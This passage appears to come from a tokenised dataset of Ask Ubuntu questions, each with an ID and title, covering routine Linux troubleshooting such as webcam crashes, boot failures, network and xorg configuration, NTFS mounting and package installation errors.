v4l2 failed ! ! init video returned -2 trying minimum setup ... video device : /dev/video0 /dev/video0 - device 1 init . intergrated webcam ( location : usb-0000:00:1a.7-2 ) { pixelformat = 'yuyv ' , description = 'yuv 4:2:2 ( yuyv ) ' } { discrete : width = 640 , height = 480 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 352 , height = 288 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 320 , height = 240 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 176 , height = 144 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 160 , height = 120 } time interval between frame : 1/30 , 1/20 , 1/15 , 1/10 , 1/5 , { discrete : width = 1024 , height = 768 } time interval between frame : 1/9 , 1/5 , { discrete : width = 1280 , height = 1024 } time interval between frame : 1/9 , 1/5 , checking format : 1448695129 requested format unavailable : get width 640 height 480 vid:0c45 pid:6410 driver : uvcvideo ( guvcview:4079 ) : gtk-critical ** : gtk_hscale_new_with_range : assertion `min < max ' failed ( guvcview:4079 ) : gtk-critical ** : gtk_scale_set_draw_value : assertion `gtk_is_scale ( scale ) ' failed segmentation fault i suppose the problem lies in the fact , that i can not locate a configuration file to edit . any help in where this file may lie ? i have tried searching for any/everything related to guvcview , and have had zero success . thank you for taking the time to read this , and hopefully providing a solution..
314091	ubuntu 12.04 booting into busybox after update	every time the system updates the kernel from 3.5.0-24 to 3.5.0-34 i get dropped into a busybox prompt at boot , but i can boot just fine using the previous kernel . i 've tried all i know . i did a fsck.ext3 -f /dev/sdb2 using the alternate install cd . i 've used boot-repair but to avail , i 've checked for bad blocks but there are none . should i purge the new kernel and use the old one instead ? this is the output from boot-repair the first time , no purge . http : //paste.ubuntu.com/5809230/
314094	how to start , stop and restart rtorrent ?	i just installed rtorrent on my ubuntu server 12.04 lte machine via apt-get . how do i start | stop | restart the service ?
314099	custom .desktop file ( mupen64plus ) ?	i created a custom .desktop file and seem to got most of it working according to unitylaunchersanddesktopfiles i had gotten it to come up in dash the first time by copying it to /usr/share/applications but it wont show up in dash anymore ? i used a terminal sudo cp ~/.64roms/n64.desktop /usr/share/applications tested and worked , then to edit it i sudo rm /usr/share/applications/n64.desktop deleted it , and then re-ran the cp to copy the newly edited file to applications but now does not show up in dash ? here is the original .desktop file contents . [ desktop entry ] version=1.0 name=n64 comment=mupen64plus exec=gnome-terminal icon=/home/drew/.64roms/n64logo.svg terminal=true type=application categories=games ; media actions=ssbros [ desktop action ssbros ] name=supersmashbros exec=cd ~/.64roms mupen64plus supersmashbros.z64 while i am on it basicly what i am doing is making an icon with actions for each of roms . eg . i think i am doing this right when i right-click and press the supersmashbros action it opens a terminal and runs cd ~/.64roms mupen64plus supersmashbros.z64 edit -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - i managed to get to somewhat work via [ desktop entry ] version=1.0 name=n64 comment=mupen64plus exec=gnome-terminal icon=/home/drew/.64roms/n64logo.svg terminal=true type=application categories=games ; media actions=ssbros [ desktop action ssbros ] name=supersmashbros exec=gnome-terminal -e mupen64plus ~/.64roms/supersmashbros.z64 it opens up terminal , and runs the mupen64plus command fine , but says `` error : no rom filepath given '' i tried the command with /home/drew/.64roms/supersmashbros.z64 with no success either .
314100	cant recognize live usb when booting	could somebody please help me with this ? i have checked and double checked that secure boot is disable in the uefi settings . no matter what i do , i can not get my ubuntu live usb to be listed under the `` use a device '' menu when trying to boot from it . i have tried different usb drives and different programs to create the live usb . could anyone please suggest any possible causes for this ? cheers !
314101	can my computer run ubuntu ?	just want to check if my computer can run ubuntu . it is an old ibm thinkpad , so here are the basic stats i could find : ibm 28832zu processor intel ( r ) celeron ( r ) m processor 1300mhz processor speed 1.27 ghz memory ( ram ) 2048 mb operating system microsoft windows xp professional operating system version 5.1.2600 intel extreme graphics 2m and here is some info pulled from the graphics panel ntel ( r ) extreme graphics 2 for mobile report report date : 06/28/2013 report time [ hr : mm : ss ] : 17:53:20 driver version : 6.14.10.3943 operating system : windows nt* 5.1.2600 service pack 2 default language : english directx* version : 9.0 physical memory : 2038 mb min . graphics memory : 8 mb max . graphics memory : 64 mb graphics memory in use : 7 mb processor : x86 family 6 model 9 stepping 5 processor speed : 1296 mhz device revision : 2 output devices connected to graphics accelerator * active notebook displays:1
314102	deploying my customized ubuntu to other machines	recently i customized ubuntu 13.04 with our company theme , color , logos and icons and programs that the company needs mainly for the developers . my question is simple and i hope the answer is simple as well or even if it 's complicated it does n't matter . is there a way i can make a redistributable iso so that it can be installed into another computer ? if anyone can help it would be greatly appreciated .
314105	run ubuntu touch developer preview on desktop ?	is there a way to run the ubuntu touch developer preview in an emulator or virtualbox on 13.04 desktop ? id like to develop a cross-platform app but i do not have a device i can flash the touch preview too for editing .
314108	ubuntu nexus 7 installer fails due to bad checksums	i 'm trying to install ubuntu on my nexus 7 but the downloaded images always fail the checksum validation . i tried the manual installation but the link to the images is broken and poking around in the mirror yielded no results . what do i do ?
314116	show buddy when offline	in pidgin , if a buddy is online , i can right click `` show when offline '' , and i 'll continue seeing the buddy in my list when he logs off . however , what if the buddy is offline when i want to do this ? i can right click on the buddy group and `` show when offline '' to see all offline buddies , but when i right click on one of them , the option is now `` hide when offline '' . i realize i could create a special `` show when offline '' group , but is there a way to show specific offline buddies without changing their group , and without waiting for them to come online first .
314119	reset lightdm 's theme	i changed lightdm 's theme using ubuntu-tweak on ubuntu 13.04 . lightdm did not show the changes . instead , lightdm lacks a background ( solid purplish-pink ) and uses odd-looking icons . i decided to undo my changes . i tried reinstalling lightdm , but that did not work . what could i try ? would doing a complete removal in synaptic work followed by a fresh lightdm install ? i can not fix the theme using ubuntu-tweak .
314121	ubuntu server and setting up two nic cards	i have ubuntu server on a computer with a wireless and hardwired nic card . the wireless needs to get the internet and pass it to the ubuntu server as well as pass it along to the hardwired nic card to more computers . i am having issues getting the basic set up as i believe the route table is grabbing from the wrong nic card . the router is 192.168.1.0 and the server is set to 192.168.1.11 on the wireless card through dhcp eth0 ( wired nic card ) is set up to be 10.10.10.0 and the server is 10.10.10.1 ) i am not a linux or networking guru but basically i am trying to have internet come from a guest network 192.168.1.0 i believe to give internet to the ubuntu server then the ubuntu server will also a ) have the wired nic serve dhcp addresses to other computers via a switch or router ( that acts as a switch ) via 10.10.10.0 addresses . and i would love if it also passed along internet capabilities as well if possible . bu really at this point my hope is to at least get the internet working on the server and the dhcp to pass correctly . at the moment the specific issue i am having is getting ubuntu server to connect to the internet and have both nic cards up and running correctly . any help would be appreciated ! the route table is as follows : destination gateway gm flags metric iface 0.0.0.0 10.10.10.1 0.0.0.0 ug 100 eth0 10.10.10.0 0.0.0.0 255.255.255.0 u 0 eth0 169.254.0.0 0.0.0.0 255.255.0.0 u 0 eth0 1992.168.1.0 0.0.0.0 255.255.255.255.0 u 0 eth1 my interfaces is set up as follows : auto lo iface lo inet loopback auto eth0 iface eth0 inet static address 10.10.10.1 netmask 255.255.255.0 network 10.10.10.0 broadcast 10.10.10.255 gateway 10.10.10.1 domain-name-servers 192.168.1.0 auto eth1 iface eth1 inet dhcp netmask 255.255.255.0 gateway 192.168.1.0 wpa-driver wext wpa-ssid `` ssid_name '' wpa-ap-scan 1 wpa-proto wpa wpa-pairwise ccmp wpa-group ccmp wpa-key-mgmt wpa-psk wpa-psk `` hash '' my dhcpd.conf ( as there is a domain name server on here is as follows ) : ddns-update-style none default-lease-time 600 max-lease-time 7200 authoritative option domain-name `` kamron 's network '' option subnet-mask 255.255.255.0 option broadcast-address 10.10.10.255 option routers 192.168.1.0 option domain-name-server 192.168.1.0 98.223.128.213 ooption subnet 10.10.10.0 netmask 255.255.255.0 { range 10.10.10.10 10.10.10.99 } log-facility local7
314122	stop update-notifier from loading up	everytime my ubuntu 13.04 system loads up , update-notifier opens with a list if software that can be updated . i do not want update-notifier to open . i have checked its settings and the cron and at tables for my account . oddly , nothing is seen that would make update-notifier to come up . how can i make it stop checking for updates and not execute ?
314126	cant play games fullscreen	i have installed several games from steam , but when i open all of them they go fullscreen and the screen is black . i can here the sounds of the game but can see nothing . my gpu is a amd radeon 6858 and i have catalyst 13.4 on ubunt 12.10 . any ideas as to how i can go about preventing this ?
314132	secure boot windows 8 issues it hates ubuntu : (	im running into issues with windows 8. ok so i disabled secure boot from my laptop . i tell it to launch from my usb with ubuntu installed on it and it wont boot . just simply light my screen and darken it . iv google the fire out of this and no use so im asking for help . im useing ubuntu 13.04. more details : well i have tryed to boot another os ( zorin ) and it hates it too . i dont know why my secure boot wont shut off . if it helps i have a hp 2000 . edit : i tryed to follow that guid and i dont want to disable ueif just secure boot . how would one go about this
314133	unable to use flash in google chrome	i have xubuntu 12.04 . i have tried everything . google chrome keeps giving me the could not load shockwave flash message . please help , i really need flash .
314139	how do i install the php gearman library in ubuntu 13.04 ?	it does n't appear to be a package in the repository and installing the pecl extension seems to fail . is there a way for me to do a managed installation of this library without having to download a tar.gz and compile it manually ?
314143	windows move onto second monitor when i turn it on	i 'm using a small monitor for my main display i also have an lcd tv hooked up through hdmi as my secondary display . the problem is whenever i turn on the tv most but usually not all of my currently running program windows jump to the secondary display . this is very annoying , because i do n't like to keep my tv on unless i 'm using it . so when i do turn it on i have to drag and drop each of the windows back on to my main display . i have played around with some compiz settings to no avail please help .
314144	how to stream on twitch.tv	alright so i 've had linux ubuntu 12.04 for over a year now and i still do n't know anything about it . that only thing i can do with it is use the internet . i want to start streaming games that i play on my computer to twitch.tv. , but i do n't know how . all of the downloads are only for windows . i found a website that tells you how to do it , but since i know nothing about linux , i ca n't do it . i have n't been able to get past the first step yet . can someone please give me a step by step tutorial on how to do it . please do not think you are being to specific , because i am sure it will help me . the link to the website is this -http : //www.creativetux.com/2012/11/streaming-to-twitchtv-with-linux.html
314146	how to uninstall theme in ubuntu 13.04	i am new to ubuntu and if i install the following theme by the commands : $ wget -c www.j-baer.com/wp-content/uploads/ax-install.tar.gz $ tar -zxvf ax-install.tar.gz $ sudo sh installax.sh and $ sudo sh enableubuntuscrollbars.sh how can i uninstall the above installed theme ?
314156	is it true that canonical shares some user 's information with amazon without asking for permission to ubuntu 's user ?	i heard richard stallman saying it ... he says ubuntu violates the privacy of the user by giving information to amazon without permission .
314157	software updater not working	the following error occurred while opening software updater/ubuntu software center/sypnatic package manager/software sources . e : encountered a section with no package : header , e : problem with mergelist /var/lib/apt/lists /ppa.launchpad.net_atareao_atareao_ubuntu_dists_quantal_main_i18n_translation-en , e : the package lists or status file could not be parsed or opened . how to solve this problem ? . any help please .
314163	sound , video , and ethernet drivers	i 'm a first time user of ubuntu . where can i get the sound , video , and ethernet drivers for ubuntu 12.04.2 ?
314165	how to not show a user in the ubuntu login screen ?	i have created a user called training using the adduser command and user training appears in the login screen . how to not show any particular user in the login screen ? i am using ubuntu 12.04 with the default unity .
314166	unable to add nodes to maas server running in virtualbox	i have followed the tutorials here and here . my maas master server ( running ubuntu 12.04 server ) is already set up in a virtualbox vm . i have not installed dhcp on this server as i already have a dhcp server on my lan router . i am also able to access the maas web-interface from my host ubuntu 12.04 desktop machine 's web browser . however , when i try to add nodes to the maas server by using the `` multiple server install with maas '' method of the ubuntu 12.04 server iso , the node does not get added to the maas server . for clarification , the node is also a virtualbox vm . after the network auto-configuration step has completed , i am presented with the following options : ubuntu-maas-master maas server - ( 192.168.1.105:80 ) specify maas by name or address create a new maas on this server so , i select the first option ( ubuntu-maas-master maas server ) , which is the correct ip address of my maas master server vm . after this , the node vm sigkills all processes and shuts down . on the maas master server , i can see this error message in /var/log/maas/maas.log : http : //paste.ubuntu.com/5809908/ . can anyone help me solve the problem so that i can test maas in virtualbox ?
314167	ca n't get matrox quad head working	i have xubuntu 13.04 newly installed . i 'm trying to get my matrox m9148 gpu to work . i had to create and edit an xorg.conf file , and now the card outputs to all monitors , but no program windows display , even though they are there and i can interact with them . it 's like their alpha is set to 0 . even the login screen window is gone , only the background image is present , and the desktop icons if i login . also , the mouse will travel to the other monitor , but changes to an x , and the cursor is duplicated on screen 0 as an x. i 'm on my phone , or i 'd attach xorg.conf file . i 'll do that when i can . =================================================== here 's xorg.conf : section `` serverlayout '' identifier `` x.org configured '' screen 0 `` screen0 '' 0 0 screen 1 `` screen1 '' rightof `` screen0 '' screen 2 `` screen2 '' rightof `` screen3 '' screen 3 `` screen3 '' below `` screen0 '' inputdevice `` mouse0 '' `` corepointer '' inputdevice `` keyboard0 '' `` corekeyboard '' endsection section `` files '' modulepath `` /usr/lib/xorg/modules '' fontpath `` /usr/share/fonts/x11/misc '' fontpath `` /usr/share/fonts/x11/cyrillic '' fontpath `` /usr/share/fonts/x11/100dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/75dpi/ : unscaled '' fontpath `` /usr/share/fonts/x11/type1 '' fontpath `` /usr/share/fonts/x11/100dpi '' fontpath `` /usr/share/fonts/x11/75dpi '' fontpath `` /var/lib/defoma/x-ttcidfont-conf.d/dirs/truetype '' fontpath `` built-ins '' endsection section `` module '' load `` glx '' endsection section `` inputdevice '' identifier `` keyboard0 '' driver `` kbd '' endsection section `` inputdevice '' identifier `` mouse0 '' driver `` mouse '' option `` protocol '' `` auto '' option `` device '' `` /dev/input/mice '' option `` zaxismapping '' `` 4 5 6 7 '' endsection section `` monitor '' identifier `` monitor0 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor1 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor2 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` monitor '' identifier `` monitor3 '' vendorname `` monitor vendor '' modelname `` monitor model '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` noaccel '' # [ < bool > ] # option `` swcursor '' # [ < bool > ] # option `` independent '' # [ < bool > ] # option `` usekernelmodule '' # [ < bool > ] # option `` mon0_forcedvi '' # [ < bool > ] # option `` mon1_forcedvi '' # [ < bool > ] # option `` mon2_forcedvi '' # [ < bool > ] # option `` mon3_forcedvi '' # [ < bool > ] # option `` icdop1 '' # [ < bool > ] # option `` icdop2 '' # [ < bool > ] identifier `` card0 '' driver `` m9x '' busid `` pci:1:0:0 '' screen 0 option `` independent '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` swcursor '' # [ < bool > ] # option `` kmsdev '' # < str > # option `` shadowfb '' # [ < bool > ] identifier `` card1 '' driver `` m9x '' busid `` pci:1:0:0 '' screen 1 option `` independent '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` rotate '' # < str > # option `` fbdev '' # < str > # option `` debug '' # [ < bool > ] identifier `` card2 '' driver `` m9x '' busid `` pci:1:0:0 '' screen 2 option `` independent '' endsection section `` device '' # # # available driver options are : - # # # values : < i > : integer , < f > : float , < bool > : `` true '' / '' false '' , # # # < string > : `` string '' , < freq > : `` < f > hz/khz/mhz '' , # # # < percent > : `` < f > % '' # # # [ arg ] : arg optional # option `` shadowfb '' # [ < bool > ] # option `` defaultrefresh '' # [ < bool > ] # option `` modesetclearscreen '' # [ < bool > ] identifier `` card3 '' driver `` m9x '' busid `` pci:1:0:0 '' screen 3 option `` independent '' endsection section `` screen '' identifier `` screen0 '' device `` card0 '' monitor `` monitor0 '' endsection section `` screen '' identifier `` screen1 '' device `` card1 '' monitor `` monitor1 '' endsection section `` screen '' identifier `` screen2 '' device `` card2 '' monitor `` monitor2 '' endsection section `` screen '' identifier `` screen3 '' device `` card3 '' monitor `` monitor3 '' endsection
314168	ubuntu to win 7 without data loss	i accidently compressed my c drive in windows 7 and ended up with `` bootmgr is compressed '' error . i had to install ubuntu to get some files . after that i went online and found some solutions for fixing the 'bootmgr ' error . can i go back to windows 7 without losing any data ? i heard that ubuntu formats the hdd to a format that windows does not recognise . what should i do ? i am sure i did n't do a full installation of ubuntu . and also how can i remove ubuntu completely ?
314169	how to change ip address and ip location ?	i want to change my ip address and ip location manually or randomly for using the internet anonymously , but i ca n't find the correct way to do this . please help me find any software to do above things .
314176	how can i install downloaded 'netbeans ' in ubuntu 12.04 ?	i am new to ubuntu . i 've just downloaded 'netbeans ide 7.3 ' for linux and 'jdk 7 ' . but do n't know how to install them . please tell me proper step by step procedure on installing these application .
314179	no icons or bars show up in the desktop , after a recent ubuntu 13 update	since a recent ubuntu update , i have the problem that no icons show up in the desktop ( no possibility for me to launch any program / software centre from the desktop ... how could i solve this ? would installing `` vanilla ubuntu 13.04 '' work ? how to do this from terminal ? i tried typing sudo apt-get vanilla ubuntu 13.04 but does not work .
314180	how to install `workman` layout in ubuntu ?	i want to install workman layout on ubuntu , i do not know how to do that ? ! workman layout blog : http : //www.workmanlayout.com download : http : //www.workmanlayout.com/blog/ ? page_id=964
314181	what tools do i have available to test a hard drive 's health ?	i 've got an older hard drive that i have recently re-formatted to ext4 and would like to use it as a spare of a spare backup . before i put any data on it , i was wondering what tools , or applications , that i can use to test its health and reliability . i have run a fsck against it and smartctl tools indicates that the drive is healthy . are there any other utilities that i could run against this drive to give it a basic health pass ? this is not mission critical . i am just looking for some additional day-to-day utilities to ease my mind . thanks .
314185	how to take control over update action ?	i have message ( motd - message of the day ) that there 's some updates for my server . now , if i do n't want simply to do what they told me ( apt-get update , apt-get upgrade ) and to have some control over the further update , what exactly should i do ? by having some control i mean : to have exact list of packages to be downloaded and installed to have ability to exclude some of them if i want so
314187	changing refit default boot	new linux ( ubuntu 13.04 ) user with a 4,1 macbook and i 'm unable to set ubuntu as my default boot with refit . i used the guide below , but i do not get the same terminal output . i get this instead : ~ ~ ~ ~ ~ ~ '' /etc/efi/refit/refit.conf '' [ new directory ] http : //thehungrycoder.com/tutorial/setting-linux-as-default-in-refit-boot-loader.html
314191	installing ubuntu replacing windows 7 on my pc	i wanted to ask that whether installing ubuntu replacing windows 7 on my pc , erases the files on the other drives or only removes the file from the c drive in which i have my system files ? and would i need to download special softwares for proper running of ubuntu ? and what about the sund card and audio drivers ? please help .
314195	creating a user called 'root '	i am creating virtual machines using the ubuntu-vm-builder . the syntax goes something like this : ubuntu-vm-builder kvm precise \ -- domain newvm \ -- dest newvm \ -- arch i386 \ -- hostname hostnameformyvm \ -- mem 256 \ -- user john \ -- pass doe \ -- ip 192.168.0.12 \ -- mask 255.255.255.0 \ -- net 192.168.0.0 \ -- bcast 192.168.0.255 \ -- gw 192.168.0.1 \ -- dns 192.168.0.1 \ -- mirror http : //archive.localubuntumirror.net/ubuntu \ -- components main , universe \ -- addpkg acpid \ -- addpkg vim \ -- addpkg openssh-server \ -- addpkg avahi-daemon \ -- libvirt qemu : ///system ; i need to enable the 'root ' user account after creating each of my vms ( and supply a password for it ) . i was just wondering whether i can take this short-cut of supplying the username ( -- user ) as root in this command itself . if i supply username as root to create my vms , am i creating/enabling the root user , or just creating a user named as root ? p.s . : any better ways to achieve my task are also welcome . but i do n't want to manually meddle with each vm after its creation
314205	how to mount usb flash drive to wine ?	i download yumi from pendrivelinux.com , the website tell me i can use wine to run it ( using wine from default repo on raring ) , but when i run it my usb drive wont show up on yumi , i have tried to unmount the usb drive in ubuntu but still it not available on yumi.\ update : error using multisystem after clicking confirm :
314208	updating update screen	i was wondering why my update statues does not change . i have incorporated ever update since i have installed ubuntu but it still reads that i have not updated for over a hundred days .
314209	need help with chronic slow wifi connections	i have had chronic slow wifi connections on several networks for a while now , i think since my update to 12.04 when it came out . i have tried many of the tips and tricks already available out there in the forums with no luck ( wicd , etc.. ) . i want to see if any of you experts out there might be able to help me , and thanks in advance ! ! i use ubuntu 12.04 on a lenovo ideapad y650 , and most networks i connect to lose the connection frequently or do not give appropriate bandwidth when i am connected . here are some results of the usual go-to system checks : cat /etc/lsb-release ; uname -a : distrib_id=ubuntu distrib_release=12.04 distrib_codename=precise distrib_description= '' ubuntu 12.04.2 lts '' linux mgeorge-lenovo 3.2.0-48-generic-pae # 74-ubuntu smp thu jun 6 20:05:01 utc 2013 i686 i686 i386 gnu/linux lspci -nnk | grep -ia2 net : 04:00.0 network controller [ 0280 ] : intel corporation pro/wireless 5100 agn [ shiloh ] network connection [ 8086:4237 ] subsystem : intel corporation wifi link 5100 agn [ 8086:1211 ] kernel driver in use : iwlwifi -- 08:00.0 ethernet controller [ 0200 ] : broadcom corporation netlink bcm5784m gigabit ethernet pcie [ 14e4:1698 ] ( rev 10 ) subsystem : lenovo device [ 17aa:3878 ] kernel driver in use : tg3 lsusb : bus 001 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 002 device 001 : id 1d6b:0002 linux foundation 2.0 root hub bus 003 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 004 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 005 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 006 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 007 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 008 device 001 : id 1d6b:0001 linux foundation 1.1 root hub bus 002 device 002 : id 090c:7371 silicon motion , inc. - taiwan ( formerly feiya technology corp. ) iwconfig : lo no wireless extensions . wlan0 ieee 802.11abgn essid : '' dyno '' mode : managed frequency:2.412 ghz access point : cc:5d:4e:46:0a:93 bit rate=150 mb/s tx-power=15 dbm retry long limit:7 rts thr : off fragment thr : off power management : off link quality=70/70 signal level=-40 dbm rx invalid nwid:0 rx invalid crypt:0 rx invalid frag:0 tx excessive retries:948 invalid misc:728 missed beacon:0 eth0 no wireless extensions . rfkill list all : 0 : ideapad_wlan : wireless lan soft blocked : no hard blocked : no 1 : ideapad_bluetooth : bluetooth soft blocked : yes hard blocked : no 2 : phy0 : wireless lan soft blocked : no hard blocked : no lsmod : module size used by uvcvideo 67203 0 videodev 86588 1 uvcvideo nouveau 712674 3 ttm 65344 1 nouveau drm_kms_helper 45466 1 nouveau drm 197641 5 nouveau , ttm , drm_kms_helper i2c_algo_bit 13199 1 nouveau mxm_wmi 12893 1 nouveau wmi 18744 1 mxm_wmi joydev 17393 0 arc4 12473 2 snd_hda_codec_realtek 174313 1 snd_hda_codec_hdmi 31775 1 snd_hda_intel 32719 3 snd_hda_codec 109562 3 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel snd_hwdep 13276 1 snd_hda_codec snd_pcm 80916 3 snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec snd_seq_midi 13132 0 snd_rawmidi 25424 1 snd_seq_midi snd_seq_midi_event 14475 1 snd_seq_midi psmouse 86520 0 snd_seq 51592 2 snd_seq_midi , snd_seq_midi_event serio_raw 13027 0 snd_timer 28931 2 snd_pcm , snd_seq snd_seq_device 14172 3 snd_seq_midi , snd_rawmidi , snd_seq iwlwifi 366509 0 mac80211 436493 1 iwlwifi snd 62218 16 snd_hda_codec_realtek , snd_hda_codec_hdmi , snd_hda_intel , snd_hda_codec , snd_hwdep , snd_pcm , sn d_rawmidi , snd_seq , snd_timer , snd_seq_device ideapad_laptop 17890 0 sparse_keymap 13658 1 ideapad_laptop cfg80211 178877 2 iwlwifi , mac80211 ir_lirc_codec 12739 0 lirc_dev 18700 1 ir_lirc_codec soundcore 14635 1 snd snd_page_alloc 14108 2 snd_hda_intel , snd_pcm ir_mce_kbd_decoder 12681 0 ir_sony_decoder 12462 0 ir_jvc_decoder 12459 0 ir_rc6_decoder 12459 0 ir_rc5_decoder 12459 0 rc_rc6_mce 12454 0 ir_nec_decoder 12459 0 video 19115 1 nouveau ene_ir 18019 0 rc_core 21263 10 ir_lirc_codec , ir_mce_kbd_decoder , ir_sony_decoder , ir_jvc_decoder , ir_rc6_decoder , ir_rc5_decoder , rc_rc6_mce , ir_nec_decoder , ene_ir bnep 17830 2 rfcomm 38139 0 parport_pc 32114 0 bluetooth 158479 10 bnep , rfcomm ppdev 12849 0 binfmt_misc 17292 1 mac_hid 13077 0 lp 17455 0 parport 40930 3 parport_pc , ppdev , lp tg3 141414 0 nm-tool : networkmanager tool state : connected ( global ) - device : eth0 -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- - type : wired driver : tg3 state : unavailable default : no hw address : 00:23:5a : cc:85 : bd capabilities : carrier detect : yes wired properties carrier : off - device : wlan0 [ dyno ] -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- -- type : 802.11 wifi driver : iwlwifi state : connected default : yes hw address : 00:22 : fa : d0:94 : ca capabilities : speed : 150 mb/s wireless properties wep encryption : yes wpa encryption : yes wpa2 encryption : yes wireless access points ( * = current ap ) *dyno : infra , cc:5d:4e:46:0a:93 , freq 2412 mhz , rate 54 mb/s , strength 81 wpa2 ipv4 settings : address : 10.0.0.43 prefix : 24 ( 255.255.255.0 ) gateway : 10.0.0.1 dns : 10.0.0.1
314210	how do i find out the version of zookeeper i am running ?	i have an ubuntu-12.04 vm running on my laptop.i have installed zookeeper on it using the command sudo apt-get install zookeeper now for traditional ubuntu programs i check the version using -- version command line option.for example gcc -- version gives the version of gcc as 4.6.3 ( for e.g ) similarly how do i find out the version of zookeeper ? first of all it does n't have a binary called zookeeper.i does have a binary called zooinspector which does not respond to -- version . i am very new to zookeeper.any help would be appreciated .
314212	`` the ntfs partition is in an unsafe state '' when trying to mount ntfs partition ?	i installed ubuntu 13.4 to replace windows 8 . after the installation was complete i ca n't access my partitions and receive a message like this : error mounting /dev/sda5 at /media/manaf/01cd6c0800cee670 : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sda5 '' `` /media/manaf/01cd6c0800cee670 '' ' exited with non-zero exit status 14 : the disk contains an unclean file system ( 0 , 0 ) . metadata kept in windows cache , refused to mount . failed to mount '/dev/sda5 ' : operation not permitted the ntfs partition is in an unsafe state . please resume and shutdown windows fully ( no hibernation or fast restarting ) , or mount the volume read-only with the 'ro ' mount option . '' how can i mount this drive without the error ?
314215	packages are not available under 13.04 ?	i have a small problem with installing packages under ubuntu 13.04 . yesterday i wanted to install `` pdfshuffler '' ( https : //apps.ubuntu.com/cat/applications/raring/pdfshuffler/ ) . if i go to the ubuntu software center and look for `` pdfshuffler '' there is one item in the list ( the package i want to install ) . when i click once on this item , the install button does not appear . if i then on furter information a error message appears telling me that there is no package called pdfshuffler in my package sources . i tried to install other packages like eclipse or supertux but nothing works . why ca n't ubuntu find these packages ? best regards , sven ...
314217	how to find out which python script is using resources ?	can someone tell me how to find out which python script is using lots of system resources ? i can see with the 'top ' command that a process called `` python '' is always near the top of the list . 2603 jesse 20 0 159m 27m 13m s 6 1.4 1:47.74 python can someone tell me how to find this specific python script 's name ? i could go through the arduous process of disabling startup apps/processes until i finally found the one that starts this python process but there must be a better way of determining what exactly this python process is , yes ? doing a ps -ah does n't yield anything useful . ps -ah 1 ? 00:00:00 init ... 1325 ? 00:00:00 lightdm 1382 tty7 00:01:57 xorg 2265 ? 00:00:00 lightdm 2510 ? 00:00:00 gnome-session 2546 ? 00:00:00 ssh-agent 2560 ? 00:00:02 gnome-settings- 2582 ? 00:00:01 syndaemon 2578 ? 00:00:49 compiz 3009 ? 00:00:00 sh 3010 ? 00:00:01 gtk-window-deco 2590 ? 00:00:00 nm-applet 2591 ? 00:00:00 bluetooth-apple 2592 ? 00:00:00 indicator-ubunt 2593 ? 00:00:00 gnome-fallback- 2600 ? 00:00:05 nautilus 2601 ? 00:00:00 everpad 2603 ? 00:02:24 python
314221	getting errors when installing packages	which ever package i try and install i seem to get the following error installarchives ( ) failed : preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... preconfiguring packages ... selecting previously unselected package libphonon4 . ( reading database ... ( reading database ... 5 % ( reading database ... 10 % ( reading database ... 15 % ( reading database ... 20 % ( reading database ... 25 % ( reading database ... 30 % ( reading database ... 35 % ( reading database ... 40 % ( reading database ... 45 % ( reading database ... 50 % ( reading database ... 55 % ( reading database ... 60 % ( reading database ... 65 % ( reading database ... 70 % ( reading database ... 75 % ( reading database ... 80 % ( reading database ... 85 % ( reading database ... 90 % ( reading database ... 95 % ( reading database ... 100 % ( reading database ... 286403 files and directories currently installed . ) unpacking libphonon4 ( from ... /libphonon4_4 % 3a4.7.0really4.6.0-0ubuntu1_amd64.deb ) ... selecting previously unselected package phonon-backend-gstreamer . unpacking phonon-backend-gstreamer ( from ... /phonon-backend-gstreamer_4 % 3a4.7.0really4.6.2-0ubuntu0.1_amd64.deb ) ... selecting previously unselected package gstreamer0.10-ffmpeg . unpacking gstreamer0.10-ffmpeg ( from ... /gstreamer0.10-ffmpeg_0.10.13-1_amd64.deb ) ... selecting previously unselected package phonon . unpacking phonon ( from ... /phonon_4 % 3a4.7.0really4.6.0-0ubuntu1_amd64.deb ) ... selecting previously unselected package minitube . unpacking minitube ( from ... /minitube_1.6-1_amd64.deb ) ... processing triggers for hicolor-icon-theme ... processing triggers for bamfdaemon ... rebuilding /usr/share/applications/bamf.index ... processing triggers for desktop-file-utils ... processing triggers for gnome-menus ... processing triggers for man-db ... setting up icaclient ( 12.1.0 ) ... dpkg : error processing icaclient ( -- configure ) : subprocess installed post-installation script returned error exit 